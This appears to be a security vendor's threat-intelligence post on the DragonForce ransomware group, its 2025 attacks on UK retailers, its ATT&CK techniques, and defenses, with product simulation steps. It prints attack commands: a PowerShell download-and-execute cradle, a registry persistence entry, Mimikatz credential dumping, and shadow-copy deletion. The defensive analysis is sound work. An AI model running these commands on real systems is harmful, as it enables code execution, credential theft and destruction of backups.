Retail Under Fire: Inside the DragonForce Ransomware Attacks on Industry Giants
Who Is the DragonForce Ransomware Group?
DragonForce is a relatively new ransomware operation that emerged in late 2023 and quickly evolved into a Ransomware-as-a-Service (RaaS) “cartel”. Unlike single-group ransomware gangs, DragonForce recruits affiliate hackers and even other RaaS groups, offering them its ransomware platform under a white-labelmodel. In other words, affiliates can carry out attacks using DragonForce’s infrastructure and encryptor while branding the attack as their own. DragonForce’s operators take a 20% cut of any ransom but handle the heavy lifting (malware development, leak site, payment negotiation) on their servers.
History and Motivation
The group’s presence was first noted in mid-2023, and by June 2024 it had launched a full affiliate program. Researchers report that DragonForce’s malware is built from the leaked source code of infamous ransomware like LockBit 3.0 and Conti, giving it a robust and tested foundation. The gang is purely financially motivated – a DragonForce representative told the press they are “here for business and money”.
Interestingly, they claim to follow a moral code: for example, they avoid certain healthcare targets (even professing empathy for cancer or cardiac patients). Whether this moral stance holds true is debatable, but it indicates DragonForce is not driven by political or ideological goals, unlike some hacktivists.
Recent Retail Attacks: DragonForce in Action?
Recent incidents in April–May 2025 suggest that DragonForce or its affiliates are actively targeting large UK retail chains in a worrying spree:
Marks & Spencer (M&S) Breach – Late April 2025
M&S, one of Britain’s largest department store chains, suffered a major cyberattack that caused widespread outages. The company had to pause all online clothing and home orders for about a week, as its website and app were disrupted. In stores, even contactless payment systems and other digital services (like click-and-collect) were impacted.. Subsequent investigation revealed this was a ransomware attack.
Notably, security experts linked the M&S breach to affiliates of DragonForce – the attackers deployed the DragonForce ransomware encryptor on M&S’s network. Sources indicate the perpetrators were using techniques associated with the “Scattered Spider” group (a known affiliate crew), meaning they likely gained entry through social engineering and then leveraged DragonForce’s ransomware payload for the final encryption stage. The incident highlighted DragonForce’s ability to cripple a major retailer; M&S warehouse operations were halted and hundreds of staff were told to stay home while emergency response efforts were underway.
Co-op Group Breach – Late April 2025
Just days after the M&S attack, the Co-op Group (a large UK grocery and insurance retailer) disclosed that hackers had attempted to break into its systems [1]. Initially, Co-op characterized it as a contained incident with small impact on back-office and call center services. However, internal communications soon suggested a more serious breach. An email from Co-op’s CIO, later obtained by journalists, revealed that VPN access was suspended for all staff and employees were cautioned to be extremely vigilant on email and Microsoft Teams. The memo even advised employees hosting Teams meetings to verify all attendees on camera, implying concern that the attacker might have gained access to internal accounts or meetings.This aligns with the social engineering-heavy approach of DragonForce’s affiliates.
While Co-op has not publicly confirmed ransomware deployment, security experts noted that the incident fit the pattern of an early-stage attack that was caught in time [2]. Co-op’s swift action to shut down parts of its IT (essentially isolating systems) was praised as a proactive move to contain the threat, potentially preventing the hackers from escalating to the data theft or encryption phase.
Harrods Breach– Early May 2025
Harrods, the luxury London department store, publicly confirmed the cyberattack on Thursday, May 1, 2025. This is making Harrods the third high-profile UK retailer, coming right after Marks & Spencer and the Co-op, to report such an incident within a two-week span [3].
In response, Harrods’ IT security team restricted all internet access at its stores and facilities as a precaution on the day the breach was detected. Fortunately, Harrods stated that its stores remained operational and customers could shop online, indicating the attack was contained before causing major disruption.
At this time, there is no official confirmation that DragonForce was behind the Harrods attack. It appears to be an attempted intrusion caught early, and Harrods has not mentioned ransomware or data theft publicly. However, the timing and similarity to the other cases has raised speculation of a common culprit or campaign. We include the Harrods incident here because it underscores an emerging trend: organized cybercriminals are singling out big-name retail and department store chains. (I must emphasize that DragonForce’s involvement in the Harrods case is unconfirmed, unlike the clear DragonForce link in M&S.)
Analyzing DragonForce Ransomware's Advanced Tactics, Techniques, and Procedures (TTPs)
The following section outlines the confirmed TTPs used by DragonForce affiliates operating under its ransomware-as-a-service (RaaS) model.
Initial Access (TA0001) – Exploiting the VPN Gateway
Social Engineering & Phishing (T1566)
DragonForce affiliates frequently rely on human-targeted techniques for initial access, particularly credential theft through phishing emails and phone-based social engineering. These methods are designed to trick employees, especially IT help desks, into revealing credentials or granting access.
In the Marks&Spenser (M&S) and Co-op intrusions, it’s believed that initial access was gained through such tactics [4]. Security researchers suspect that Scattered Spider, who is a known DragonForce affiliate, was involved, pointing to the group’s typical use of phishing sites that mimic SSO portals, MFA push “bombing,” and SIM swapping [1]. These tactics aim to bypass authentication controls and exploit human trust, rather than technical vulnerabilities.
Valid Accounts (T1078)
A core feature of DragonForce intrusions is the use of legitimate accounts for access. The group capitalizes on any credentials they can steal or crack. In the M&S breach, for instance, the attackers quietly obtained the company’s Active Directory database (NTDS.dit) months before deploying ransomware [5]. This database contained password hashes for thousands of accounts, which the attackers likely cracked offline to retrieve plaintext passwords.
Armed with those credentials, including highly privileged domain admin accounts, the threat actors could log in as authorized users. Using valid accounts makes their activity blend in with normal network traffic and helps bypass security controls that only look for “outsider” threats.
Execution (TA0002) – Deploying Malware in Memory
PowerShell Scripts (T1059.001)
DragonForce often abuses PowerShell, Windows’ powerful command-line scripting language, to execute payloads and automate tasks. PowerShell is an attractive tool for attackers because it’s trusted and pre-installed on Windows.
In observed cases, the group ran malicious PowerShell commands to launch their malware and to disable security features. For example, a registry Run key used by DragonForce referenced a PowerShell command with -WindowStyle Hidden to silently execute a malicious script at startup [6]. By using PowerShell, they can download or execute malicious code directly in memory, helping them evade anti-virus detection.
(According to the DFIR analysis of security researchers, the downloaded binary was later identified as a Cobalt Strike beacon [7].)
SequenceNumber=13 |
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, the delivery phase is simulated by stealthily downloading a malicious executable to the compromised host, mirroring how DragonForce delivers its payloads in real-world attacks.
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('%remotefile-9776%')" |
User Execution of Malware (T1204.002)
When social engineering is involved, DragonForce frequently relies on tricking a user to run a file. Phishing emails have delivered attachments or links that drop malware loaders onto the victim’s machine (such as a bogus document that runs a hidden macro or an executable disguised as a PDF). This technique, which is persuading a user to execute a malicious file, is a form of user execution. Once run, that initial malware will typically call back to the attackers and pave the way for the main ransomware deployment.
In the case of DragonForce affiliates, they may use lightweight implants to establish a foothold before pulling down the full-featured tools like Cobalt Strike or the ransomware encryptor itself.
Persistence & Privilege Escalation
Registry Run Keys (T1547.001)
To maintain persistence on compromised machines, DragonForce has been seen creating or modifying Windows Registry “Run” keys. This ensures that their malware or a backdoor starts every time the system boots.
For instance, one DragonForce sample added a Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ named “socks5,” pointing to a hidden PowerShell execution command. This kind of autorun entry guarantees the attackers re-establish a foothold even after reboots.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates persistence by adding a registry key that ensures a malicious executable runs once at the next system startup:
reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "socks5" /t REG_SZ /d "%TMP%\socks aug\socks.exe" /f |
Scheduled Tasks (T1053.005)
Another persistence trick is creating scheduled tasks. DragonForce actors have created tasks in Windows that execute malicious programs on a set schedule or at system startup. Using built-in utilities like schtasks.exe or the older at command, they schedule their malware to run periodically or when a user logs in. Scheduled tasks are useful for both persistence and for executing post-compromise actions (like running a script every hour).
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the full attack lifecycle of DragonForce RaaS affiliates by replicating current TTPs observed in the wild. In this step, SCV simulates the use of scheduled tasks—a common persistence technique used by ransomware operators.
Play Processes, Process 1 |
This simulates the creation or execution of a scheduled task via PowerShell, reflecting how DragonForce may automate payload execution across reboots or at specific intervals.
Rewind Processes, Process 1 |
This step cleans up the simulated task, ensuring a safe and controlled validation cycle. By reproducing this behavior, SCV helps organizations verify whether endpoint defenses and logging tools can detect unauthorized task creation and abuse of scheduler components.
New Services (T1543.003)
In some intrusions, the attackers install a malicious Windows service for their payload. By running as a service (often configured to start automatically), the malware gains persistent system-level privileges. Creating a service can also elevate privileges if done from an admin account, since the service will run as LOCAL SYSTEM. DragonForce has leveraged this to ensure their ransomware or tooling has the highest level of access on infected endpoints.
Abuse of Valid Accounts – Domain Persistence (T1078.002)
Stealing domain credentials not only helps with initial access, but also with persistence enterprise-wide. DragonForce is known to “ride” the legitimate accounts they compromise for an extended period. By maintaining access to a compromised Active Directory account (or creating new accounts/backdoors in AD), the attackers can return even if one machine is cleaned.
In M&S’s case, having domain admin credentials meant the attackers could pivot to any system at will. Even if one backdoor was discovered, they had multiple other accounts to use as insurance. This highlights why evicting DragonForce requires a thorough credential reset and audit across the domain.
(Privileged escalation techniques often overlap with persistence in DragonForce operations, since using stolen admin accounts or services inherently gives elevated privileges. Additionally, security researchers have noted that DragonForce’s malware can leverage access token manipulation – calling Windows APIs like DuplicateTokenEx() and CreateProcessWithTokenW() – to assume the rights of more privileged users on a system [7].)
Defense Evasion
Disable Security Tools (T1562.001)
DragonForce affiliates employ aggressive methods to impair or disable defense mechanisms. A notable technique is “Bring Your Own Vulnerable Driver” (BYOVD) – they deploy a legitimate but vulnerable kernel driver to the target system and exploit it to turn off security software.
For example, the group has been observed loading the RogueKiller Anti-Rootkit Driver, a benign tool that can terminate processes, and then abusing it to kill anti-virus/EDR processes that protect the system. By using a signed driver with known flaws, they essentially gain kernel-level privileges to neutralize security products. This allows their ransomware and tools to run uninhibited. DragonForce’s use of this BYOVD tactic to disable monitoring agents and antivirus has been explicitly reported.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. These two processes are run to mimic the behavior of disarming the defensive mechanisms. Note that each process is also accompanied by a rewind process to deliver the safest way to security validation.
#Process1 |
Clear Event Logs (T1070.001)
After doing their damage, DragonForce actors attempt to cover their tracks. One common step is deleting system event logs to erase evidence of their activities.
For instance, they execute commands like wevtutil cl System and use WMI (wmic.exe shadowcopy delete) to remove Windows Shadow Copy events and other logs. By wiping logs, they impede forensic investigators from piecing together what happened.
In the M&S incident, it was noted that the attackers “deleted Windows Event Logs to impede forensic investigations”. This is a typical ransomware play to delay detection and response.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates the impact phase by executing PowerShell and Bash commands to delete Windows shadow copies and delete logs, respectively.
#Clear T0005 Action #Delete T0040 Action powershell.exe -c "Get-CimInstance Win32_ShadowCopy | Remove-CimInstance" |
Obfuscation & Anti-Analysis
The DragonForce encryptor contains code inherited from Conti that implements anti-analysis tricks. This includes packing or encrypting the ransomware binary to avoid signature detection, as well as checking for sandbox or virtualized environments to evade malware analysts. While specifics are not always public, the use of Conti’s leaked codebase means DragonForce likely benefits from Conti’s sophisticated evasion techniques (such as dynamic API imports and junk code insertion to confuse analysts). All these measures make it harder for defenders to detect and study the malware in action.
Credential Access
Credential Dumping (T1003.001 – LSASS Memory)
Once inside a network, DragonForce attackers aggressively harvest credentials. A primary technique is dumping credentials from memory, specifically from the LSASS process which stores Windows login secrets. The group leverages tools like Mimikatz to extract credentials (passwords, password hashes, Kerberos tickets) from LSASS. They may use procdump or task manager exploits to dump LSASS memory and then run Mimikatz on it offline.
Capturing credentials in this way allows the attackers to obtain domain administrator privileges and lateral movement opportunities rapidly. In past cases, they have pulled complete credential databases (e.g. the NTDS.dit file mentioned earlier), and also grabbed local administrator passwords from servers. By the time they’re ready to deploy ransomware, the attackers often have keys to the kingdom – all the accounts they need to administer and encrypt vast portions of the network.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates credential dumping, one of DragonForce's key post-exploitation techniques, by executing Mimikatz to extract cleartext passwords from memory:
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit |
This mirrors how DragonForce affiliates access credentials from LSASS to escalate privileges and facilitate lateral movement across the network.
Discovery
Network and Host Discovery (T1016, T1082)
DragonForce intruders spend time mapping out the victim’s IT environment. They run commands to discover network configurations (IP addresses, routes) and gather system information on each host (OS version, hostname, logged-in users). This reconnaissance helps them identify critical servers and plan the ransomware deployment. For instance, they might use ipconfig/ifconfig to get network info and systeminfo or WMI queries to enumerate host details.
Active Directory Querying (T1482 – Domain Trust Discovery)
The group heavily enumerates Active Directory. AdFind, a free AD query tool, is part of their toolkit. With AdFind, DragonForce operators can extract details on domain trusts, organizational units, user accounts, group memberships, and more. This tells them how the domain is structured and where high-value targets (like additional domain controllers, file servers, etc.) reside. In effect, they map trust relationships between different domain or forest segments, which can reveal if there are routes to further compromise parent or child domains.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the complete attack lifecycle of DragonForce RaaS affiliates by replicating their latest TTPs observed in active campaigns. In this phase, SCV simulates domain trust discovery, an essential reconnaissance step, by executing adfind.bat via command line.
This mirrors how DragonForce operators use tools like AdFind to query Active Directory and map relationships between domains, users, and groups.
Network Scanning (T1046)
To identify other systems to move into, DragonForce uses port scanning tools. One known tool is SoftPerfect Network Scanner– a utility that pings hosts and enumerates open ports and shared folders on the network. The attackers run such scanners to find systems running services like SMB (file shares), SQL databases, RDP, etc. For example, they might scan the network to locate all reachable servers and specifically look for backup servers or VMware ESXi hosts. In fact, the group explicitly targets VMware infrastructure, so discovering the IPs of ESXi/vCenter servers is a key reconnaissance goal.
File/Directory Discovery (T1083)
DragonForce affiliates also manually search through file shares and directories for sensitive data. Before triggering ransomware, they often spend days quietly collecting files (customer data, financial records, databases) to exfiltrate. They use commands like dir /s or PowerShell scripts to list files on network shares. Anything that looks important (e.g. large SQL backups, documents with keywords like “confidential” or “passwords”) can be flagged for exfiltration. By the time they launch the encryption, they have already identified and stolen the crown jewels of the data – maximizing their leverage over the victim.
Lateral Movement
Remote Desktop Protocol (T1021.001)
DragonForce’s go-to method for moving laterally within a network is abusing RDP. With the plethora of credentials they gather, attackers will use RDP to hop onto other systems interactively. For instance, they might take an admin account and RDP from a compromised workstation into a file server, then from there into a domain controller, and so on. RDP provides a graphical interface, which the attackers can use to manually deploy tools or ransomware on each target system. It’s been reported that DragonForce actors specifically abused RDP for internal traversal, using it to access servers and pivot deeper. They also sometimes enable RDP on systems where it was off or create new RDP sessions by adding a user to the “Remote Desktop Users” group via their domain admin privileges.
SMB/Windows Admin Shares (T1021.002)
In addition to RDP, the attackers may use SMB (Windows file sharing) to move laterally. With credentials in hand, they can connect to administrative shares (like \\HOST\C$) on remote machines to drop and execute binaries.
For example, using tools like Cobalt Strike (see below) or built-in psexec functionality, they push the ransomware executable to multiple machines and trigger it remotely. While specific reporting highlights RDP, it is likely DragonForce affiliates use a mix of methods – anything from WMI calls (wmic /node:TARGET process call create ...) to copying files over SMB – to propagate across systems. The goal is to fan out across as many servers and endpoints as possible prior to detonation of the ransomware, so no critical device is left untouched.
Command and Control
C2 over Web Protocols (T1071.001)
To coordinate their attack, DragonForce attackers install backdoors or agents that communicate with their command-and-control (C2) servers. They often use Cobalt Strike Beacon, a sophisticated post-exploitation agent, to maintain realtime control within the network. Cobalt Strike beacons typically communicate over HTTP/HTTPS (web protocols) to blend in with normal traffic.. DragonForce’s C2 traffic thus often hides in plain sight as web browsing or API calls. Using application-layer protocols not only evades some network filters, it also allows the attackers to control implants from afar – issuing commands to dump credentials, move files, or execute programs. In addition, malware like SystemBC (a SOCKS5 proxy implant) has been used, which gives the attackers a stealthy network tunnel out of the victim's environment. This combination of C2 tools ensures that even if one access point is detected, others persist.
(Because DragonForce enables affiliates to customize ransomware builds, some affiliates might use their own C2 frameworks. However, the use of widely available tools like Cobalt Strike is commonly reported. The reliance on encrypted web traffic for C2 makes detection challenging without deep packet inspection or anomaly detection on network traffic.)
Exfiltration & Impact
Data Exfiltration (Multiple Techniques)
Prior to encryption, DragonForce operators exfiltrate large amounts of data from the victim network. They have been known to use both their C2 channels and separate file transfer tools to accomplish this. In some cases, attackers compress sensitive data into archives and use cloud services or anonymous FTP to upload the haul. Others may utilize command-line tools (e.g. Rclone or wget) to send data to attacker-controlled servers. The exact techniques vary, but the outcome is the same – gigabytes or terabytes of confidential data are smuggled out. According to threat intelligence, DragonForce advertises stolen data on its leak site, and if the victim doesn’t pay, the data is published for all to see. A Resecurity report on a February 2025 attack noted that DragonForce leaked over 6 TB of data from a Middle Eastern victim when the ransom demand wasn’t met. This underscores the scale of exfiltration they are capable of.
File Encryption for Impact (T1486)
The final and most destructive phase is ransomware deployment. DragonForce’s malware (often referred to as the DragonForce encryptor) is unleashed across the network to encrypt files and render systems inoperable. Notably, DragonForce targets not just Windows machines but also Linux and VMware systems. They have developed ransomware binaries for ESXi (VMware’s hypervisor); in the M&S attack, the gang deployed the DragonForce encryptor to VMware ESXi hosts to encrypt entire virtual servers. This tactic of hitting virtualization infrastructure can cripple dozens of servers in one blow. The ransomware uses robust encryption (often combining RSA and AES) to lock files, and it can encrypt a wide range of targets including NAS storage, databases, and backups. The impact on the victim organization is immediate: business operations halt as critical data and services become unavailable. M&S, for example, had to pause all online orders and even in-store digital services for days due to the encryption event.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the complete attack lifecycle of DragonForce RaaS affiliates by replicating the latest TTPs observed in active campaigns. In this phase, SCV simulates the impact stage by mimicking the ransomware encryption process using a harmless dummy file.
Encrypting a Dummy File with ChaCha8 for DragonForce Ransomware - Process 1 |
This command encrypts a test file using the ChaCha8 algorithm, reflecting DragonForce’s use of custom encryption routines during real-world attacks. The simulation allows organizations to evaluate how well their defenses detect and respond to file encryption activity, without the risks of running actual ransomware.
Note that a common step in real-world intrusions is the display of a ransom note, used to communicate demands and payment instructions to the victim.
To replicate this behavior, SCV simulates the ransom note display by opening a dummy text file (it also has rewind action process):
notepad.exe "%TMP%\readme.txt" |
This step mimics how ransomware often drops and launches a ransom note to ensure user visibility. It allows organizations to validate whether such file access and execution events are properly logged and monitored by endpoint security tools.
Inhibiting System Recovery (T1490)
To ensure the maximum impact, DragonForce takes steps to prevent victims from easily recovering their data. This includes deleting backup files and snapshots. The ransomware or attackers will delete Volume Shadow Copies on Windows systems using commands via WMI or vssadmin.They also seek out backup servers or connected NAS devices and encrypt or erase those as well. By scrubbing backups, they remove the victim’s safety net and put them in a position where paying the ransom might be the only way to recover quickly. As one security expert noted, recently ransomware gangs (DragonForce included) are increasingly turning to data exfiltration and destruction of backups to increase their leverage.– a trend clearly seen in DragonForce’s modus operandi.
How Does Picus Help Defend Against the DragonForce Ransomware Group?
We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.
The Picus Threat Library includes the following DragonForce threat, replicating TTPs observed in the wild.
Threat ID |
Threat Name |
Attack Module |
81422 |
DragonForce Ransomware Campaign |
Windows Endpoint |
22466 |
DragonForce Ransomware Email Threat |
Email Infiltration |
25764 |
DragonForce Ransomware Download Threat |
Network Infiltration |
The Picus Mitigation Library has also provide the following mitigation suggestions regarding the DragonForce threat.
Security Control |
Signature ID |
Signature Name |
Check Point NGFW |
08403A068 |
Cryptominer.Win32.Cryptominer.TC.61a6GtVx |
Check Point NGFW |
083324DCA |
Generic.Win32.Generic.TC.e472JFkr |
Check Point NGFW |
0D5383CA0 |
UDS:Trojan-Ransom.Win32.Generic.TC.ce5aQFyH |
Check Point NGFW |
0EB4D21EB |
UDS:Trojan-Ransom.Win32.Generic.TC.c435JsqV |
Check Point NGFW |
091DA1757 |
Generic.Win32.Generic.TC.f590BaOd |
Fortinet FortiGate NGFW |
8273597 |
W32/Conti.F!tr.ransom |
Fortinet FortiGate NGFW |
8049505 |
W32/CryptoMiner.L!tr |
Fortinet FortiGate NGFW |
10173180 |
W32/Conwise.RCE!tr |
Fortinet FortiGate NGFW |
10202916 |
W32/Filecoder.OQR!tr.ransom |
Palo Alto Networks NGFW |
58330017 |
Trojan/Win32.co.gr |
Palo Alto Networks NGFW |
635486721 |
Ransom/Win32.lockbit.auy |
Palo Alto Networks NGFW |
697522821 |
Ransom/Win32.conti.jv |
Palo Alto Networks NGFW |
654915060 |
Ransom/Win32.conti.jf |
Cisco Secure Firewall |
Win.Worm.Coinminer::1201 |
|
Cisco Secure Firewall |
Auto.B9BBA0.281457.in02 |
|
Cisco Secure Firewall |
Auto.BA1BE9.281550.in02 |
|
Cisco Secure Firewall |
MalwareX:Attribute.28cn.in14.Talos |
|
Trellix IPS |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Defense Strategies Against the DragonForce Ransomware Group's Attacks
Given DragonForce’s tactics, organizations, especially those in retail and critical infrastructure, should adopt a multi-layered defense. Below are five tailored mitigation and remediation steps to counter DragonForce’s known behaviors:
Bolster Authentication and User Awareness
Since DragonForce frequently gains entry through social engineering, implement phishing-resistant multi-factor authentication across all user accounts. Favor methods like FIDO2 security keys or authenticator apps over SMS-based 2FA to thwart SIM swap and MFA fatigue attacks. Educate employees (including IT helpdesk staff) about DragonForce’s social tricks – for example, train staff to recognize fake login pages and to report unusual MFA prompts or suspicious calls claiming to be IT support. Regular phishing simulation exercises and clear policies (e.g. IT will never ask for your password on the phone) can reduce the human attack surface.
Lock Down Remote Access Points
Audit and secure any externally accessible services such as VPNs, RDP servers, and cloud admin portals. Enforce strict MFA on these services and consider placing them behind a VPN or ZTNA (Zero Trust Network Access) gateway rather than exposing them directly. DragonForce has been known to use valid credentials to log in via RDP/VPN, so ensure that default accounts are disabled and use strong, unique passwords for all accounts (with account lockout policies to deter brute force). Regularly scan for and close RDP ports or other remote admin interfaces open to the internet. Where possible, require VPN or jump-server usage for RDP so that direct RDP access to critical servers is not possible. These steps make it far harder for the attackers to exploit stolen creds or open ports as an initial foothold.
Protect Active Directory and Privileged Accounts
DragonForce’s campaign highlights the importance of safeguarding credentials. Implement measures to detect and prevent credential dumping – for instance, enable Credential Guard or LSASS memory protection on Windows endpoints to make dumping harder. Use tools that can detect Mimikatz or abnormal process access to LSASS (many EDR solutions have signatures or behavior rules for this). Monitor your domain controllers for suspicious behavior, such as unexpected retrieval of the NTDS.dit file or use of DCSync functions (which mimic domain controller replication to steal creds). Routine password changes for service accounts and privileged users can limit the value of any stolen hashes. Additionally, practice the principle of least privilege: tighten who has Domain Admin rights and use tiered administration (separate accounts for admin tasks vs. everyday use). In the event of a suspected breach, immediately invalidate or change all AD enterprise admin credentials, since DragonForce will almost certainly target those.
Endpoint Hardening and Monitoring
Deploy advanced Endpoint Detection & Response (EDR) tools and ensure they are configured in tamper-resistant mode. DragonForce actors will try to disable your security – including using BYOVD techniques to kill agents – so consider enabling features like Microsoft’s Driver Blocklist or Hypervisor-Protected Code Integrity (HVCI) to prevent unauthorized drivers from running at the kernel level.
Maintain an updated list of known vulnerable drivers (like the one they abused) and use OS controls or third-party software to block them. Configure your EDR/SIEM to alert on behaviors indicative of DragonForce tools: e.g., a sudden invocation of schtasks.exe creating weirdly named jobs, the presence of AdFind queries in command-line logs, or any process launching wmic.exe shadowcopy delete (often a sign of ransomware prepping). Network monitoring is also key – look for C2 traffic patterns such as unusual outbound HTTP/S connections (Beacon traffic) or large data transfers to unfamiliar external hosts (potential exfiltration). Early detection of these indicators can enable you to contain the attack before ransomware detonation.
Segment, Backup, and Prepare for Recovery
Given the possibility of widespread encryption, limit the blast radius through network segmentation. Isolate critical servers (e.g., domain controllers, database servers, VMware ESXi hosts) on separate VLANs with tightly controlled access. This can slow an intruder’s lateral movement and give defenders more time to notice and react. Equally important, maintain regular offline backups of key systems and data. DragonForce will try to delete on-site backups and Volume Shadow Copies, so ensure you have offsite or immutable backups that cannot be reached from the primary network. Test your backups and your restore procedures periodically – a backup is only as good as your ability to actually restore it under pressure.
In parallel, have an incident response plan that specifically covers ransomware scenarios. Conduct drills that include rapidly disconnecting or isolating infected machines (as Co-op did to contain its incident) and practicing system rebuilds. Being prepared to quickly rebuild servers or revert to clean snapshots can drastically reduce downtime. Remember that DragonForce also steals data, so include plans for data breach response: know how you will assess what was taken and how you’ll communicate with customers/regulators if leaks occur. As one cybersecurity expert advised in light of the M&S and Co-op attacks, other retailers should “take stock and learn” from these incidents – advance preparation is crucial because modern ransomware groups will use every trick (encryption, exfiltration, extortion) to pressure victims.
Continuously Test and Validate Security Controls
DragonForce Ransomware Group follows a clear sequence of behaviors. Implementing Breach and Attack Simulation (BAS) platforms, such as Picus Security Control Validation (SCV), enables security teams to emulate realistic, multi-stage attack scenarios that mirror the tactics, techniques, and procedures (TTPs) observed in their campaigns targeting the retail sector.
By continuously testing your environment against these scenarios, BAS tools can expose blind spots, validate existing controls, and generate actionable insights to improve detection and response capabilities—helping you stay one step ahead of sophisticated adversaries.
References
[1] “Website.” Available: https://www.reuters.com/world/uk/britains-co-op-is-latest-retailer-be-hit-by-cyber-attack-2025-04-30/
[2] A. Scroxton, “Co-op shuts off IT systems to contain cyber attack,” ComputerWeekly.com, Apr. 30, 2025. Available: https://www.computerweekly.com/news/366623455/Co-op-shuts-off-IT-systems-to-contain-cyber-attack. [Accessed: May 02, 2025]
[3] “Website.” Available: https://www.reuters.com/business/retail-consumer/harrods-is-latest-british-retailer-be-hit-by-cyber-attack-2025-05-01/
[4] L. Abrams, “Harrods the next UK retailer targeted in a cyberattack,” BleepingComputer, May 01, 2025. Available: https://www.bleepingcomputer.com/news/security/harrods-the-next-uk-retailer-targeted-in-a-cyberattack/. [Accessed: May 02, 2025]
[5] L. Abrams, “Marks & Spencer breach linked to Scattered Spider ransomware attack,” BleepingComputer, Apr. 28, 2025. Available: https://www.bleepingcomputer.com/news/security/marks-and-spencer-breach-linked-to-scattered-spider-ransomware-attack/. [Accessed: May 02, 2025]
[6] “[No title].” Available: https://blackpointcyber.com/wp-content/uploads/2024/11/DragonForce.pdf. [Accessed: May 02, 2025]
[7] Nikolay Kichatov Cyber Intelligence Analyst, Group-IB (APAC), Sharmine Low Malware Analyst, Group-IB (APAC), and Alexey Kashtanov Head of DFIR Practice (APAC), “DragonForce Ransomware Group,” Group-IB, Sep. 25, 2024. Available: https://www.group-ib.com/blog/dragonforce-ransomware/. [Accessed: May 02, 2025]